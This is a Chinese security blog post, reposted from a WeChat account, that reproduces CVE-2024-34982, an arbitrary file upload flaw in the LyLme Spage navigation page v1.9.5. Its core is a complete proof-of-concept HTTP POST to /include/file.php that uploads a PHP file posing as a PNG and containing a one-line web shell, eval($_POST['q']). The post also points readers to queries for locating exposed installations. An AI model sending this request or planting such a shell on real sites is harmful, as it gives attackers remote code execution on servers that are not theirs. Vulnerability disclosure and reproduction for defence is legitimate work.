本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
项目简介
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。
开发语言:PHP项目地址:https://gitee.com/LyLme/lylme_spage/
![[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传](http://cn-sec.com/wp-content/uploads/2024/05/9-1715999531.png "[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传")
空间测绘
关注公众号,回复“20240518”获取空间测绘语句漏洞描述
lylme_spage v1.9.5 组件 /include/file.php 中存在任意文件上传漏洞,允许攻击者通过上传精心设计的文件来执行任意代码。
影响版本
lylme_spage v1.9.5漏洞验证
POST /include/file.php HTTP/1.1Host: xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequestOrigin: http://127.0.0.1Accept: application/json, text/javascript, */*; q=0.01Cookie: X8Kk_2132_logintime=1713010988; X8Kk_2132_saltkey=sb50OXyE; X8Kk_2132_lastvisit=1713007324; XDEBUG_SESSION=PHPSTORM; admin_hkcms_lang=zh-cn; index_hkcms_lang=zh-cn; HKCMSSESSID=e0594fc037c66b2dcc477b032c98de35; PHPSESSID=jbl3he9k1riq937d993fc7luhi; admin_token=32cffj4RQkD5uVfTy3J25h8COeBWUDMFyPZMgE%2BSw2eAI1O%2FgJsuTSHq0vIvSxsREnWeNg59eXDvZU%2F6gdzPT3acrQContent-Type: multipart/form-data; boundary=---------------------------207262699182048909098055515Sec-Fetch-Mode: corsAccept-Encoding: gzip, deflate, brSec-Fetch-Dest: emptySec-Fetch-Site: same-originReferer: http://127.0.0.1/apply/Content-Length: 239-----------------------------207262699182048909098055515Content-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/pngeval($_POST['q']);-----------------------------207262699182048909098055515--
![[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传](http://cn-sec.com/wp-content/uploads/2024/05/3-1715999533.png "[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传")
![[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传](http://cn-sec.com/wp-content/uploads/2024/05/4-1715999537.png "[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传")
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-34982https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.mdhttps://github.com/LyLme/lylme_spagehttps://gitee.com/LyLme/lylme_spage/
关注公众号,回复“20240518”获取空间测绘语句
![[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传](http://cn-sec.com/wp-content/uploads/2024/05/10-1715999538.gif "[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传")
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论